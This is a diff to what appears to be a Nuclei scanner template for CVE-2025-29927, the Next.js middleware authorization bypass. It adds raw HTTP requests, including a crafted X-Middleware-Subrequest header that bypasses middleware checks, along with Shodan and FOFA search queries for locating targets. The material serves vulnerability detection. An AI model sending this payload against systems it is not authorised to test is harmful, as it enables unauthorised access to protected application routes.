projectdiscovery · princechaddha · Mar 25, 2025 · Mar 25, 2025 · Mar 25, 2025
diff --git a/http/cves/2025/CVE-2025-29927.yaml b/http/cves/2025/CVE-2025-29927.yaml
@@ -21,37 +21,64 @@ info:
     cwe-id: CWE-287
   metadata:
     max-request: 1
-    shodan-query: x-middleware-rewrite
-    fofa-query: x-middleware-rewrite
+    shodan-query: "x-middleware-rewrite"
+    fofa-query: "x-middleware-rewrite"
     product: next.js
     vendor: zeit
   tags: cve,cve2025,nextjs,middleware,auth-bypass
 
 flow: |
-  http(1)
+  http(1) && http(2)
+  http(3)
   for(let endpoint_urls of iterate(template.endpoints)){
     set("endpoints", endpoint_urls)
-    http(2) && http(3)
+    http(4) && http(5)
   }
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        X-Nextjs-Data: 1
 
+    matchers-condition: and
     matchers:
-      - type: word
-        part: body
-        words:
-          - "_next/static"
+      - type: regex
+        part: header
+        regex:
+          - "(?i)x-nextjs-redirect|x-middleware-rewrite|x-nextjs-rewrite"
         internal: true
 
-      - type: word
-        part: header
-        words:
-          - "Next.js"
+      - type: status
+        status:
+          - 307
         internal: true
 
+    extractors:
+      - type: regex
+        name: redirect_path
+        part: header
+        regex:
+          - "(?i)(x-nextjs-redirect|x-middleware-rewrite|x-nextjs-rewrite): (.*)"
+
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        X-Nextjs-Data: 1
+        X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
+
+    matchers:
+      - type: status
+        status:
+          - 200
+
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    redirects: true
     extractors:
       - type: regex
         name: endpoints
@@ -82,4 +109,3 @@ http:
       - type: dsl
         dsl:
           - status_code == 200
-# digest: 4a0a0047304502204bad92f37a1147138cc997530e747d57d21b21df208ac7c42ebbe46507504991022100913a3bb7b20461641ab2e4ea00b58b13c6926e1c828c9ba8453d56bb52b523d9:922c64590222798bb761d5b6d8e72950